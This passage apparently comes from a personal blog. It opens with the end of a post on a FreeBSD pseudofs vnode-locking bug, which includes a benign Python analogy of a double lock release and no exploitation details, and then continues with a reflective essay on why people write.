        VOP_UNLOCK(vp, 0);
        return (error);
}
Again, pseudofs does not implement the unlocking function and uses a default implementation which uses the lock manager.

I've not gone into the details of how the actual corruption occurs and how it can be exploited. Perhaps another time. For my task I just needed to know the call chains that lead up to the bug. Hope you enjoyed reading it. An unpatched version can be seen here: 8.3.0/sys/fs/pseudofs/pseudofs_vnops.c
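The general shape of the mistake, an inner layer releasing a lock it never took, can be shown with a small Python analogy. This follows the description in this post rather than the kernel's actual locking primitives; upper_layer and lower_layer are hypothetical names, and Python's threading.Lock is far stricter than a kernel mutex about reporting the error.

```python
import threading

node_lock = threading.Lock()

def lower_layer(lock):
    # Stand-in for the wrapper function: it releases a lock that it
    # did not acquire itself.
    lock.release()

def upper_layer(lock):
    lock.acquire()               # the layer that owns the locking protocol
    lower_layer(lock)            # ...but the callee unlocks behind its back
    try:
        lock.release()           # the legitimate, balanced unlock
    except RuntimeError:
        return "second release failed: lock was already unlocked"
    return "released cleanly"

outcome = upper_layer(node_lock)
```

Python raises an exception on the unbalanced release; the point of the analogy is that between the two releases the protected data is no longer protected.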

Sunday, 24 November 2013

Why we write.

For unknown reasons a thought bounced around: Why do people write? Let's put on the logical hat and make a list. The reasons mentioned below are very fundamental and contain many more detailed reasons. These specific ones are mentioned because the author felt that the following should not be generalized any further.

Memorialization seems to be the easiest reason and arguably the biggest reason. We want to remember things. Something happened? Write it down for future reference. Thought of a great idea? Write it down.

This, however, can be a tricky one due to all sorts of biases involved. An event happens and time passes until it is written down. With time the accuracy starts to degrade with some decay function. Then there is the problem of biases and points of view: the recorded event is at most only as accurate as the author's observation. The skill of the author in describing the events can also bring the accuracy into question. Elizabeth Loftus talks about the creation of false memories, which is hardly malicious in intent but throws even more uncertainty into the mix.

Maintaining trust in the record is an incredibly difficult undertaking. My theory is that most of us just close our eyes and pretend everything is OK unless something obvious stands out. Of course, as a society we have put in place various means of alleviating the problem of trust, such as the use of references, language standards and peer reviews, all of which reduce to some form of trust in a person. These approaches probably work well assuming that most people are not malicious in nature.

Organization is an easy one as well. With thousands of things happening all at once, there is a good chance you can't keep track of them all. This is probably closely tied to memorialization but with a different purpose.

It is a lot easier to trust the accuracy of this type of writing because the entities being described have either been documented somewhere else (shifting the validation away from the writing in question) or they are ideas created by the author. Ideas created by the author can be assumed to be 100% accurate because the writing in question is the first instance where the idea enters the world. The only other place the idea exists is the author's head, which we cannot compare against.

Discussion with yourself or others. This one is not so obvious, at least not until one thinks about the question. We write letters to discuss things with others. But we also write diaries and notes to keep track of what we've thought of in order to follow the steps of logic. Discussion is very similar to organization, as in organization of thought. However, it deserves its own mention due to the difference of intent.

The intent in writing for the sake of discussion is to show a trail of thought. Probably everyone can remember that C follows B follows A, but what if there are 30 steps? That requires writing things down, perhaps with the author as the only audience. For example, one of the purposes of this blog is to help the author organize his thoughts on experimentation.

Art. Some people like to write for the sake of writing. There is something about word play that drives people to come up with elaborate combinations that have nothing but artistic value.


In almost every case a piece of writing will contain several of these forms. In some cases the art will be pervasive through the entire piece, however others can be mutually exclusive in different parts of the written piece. When the author puts their art into the writing, the readers enjoy it more.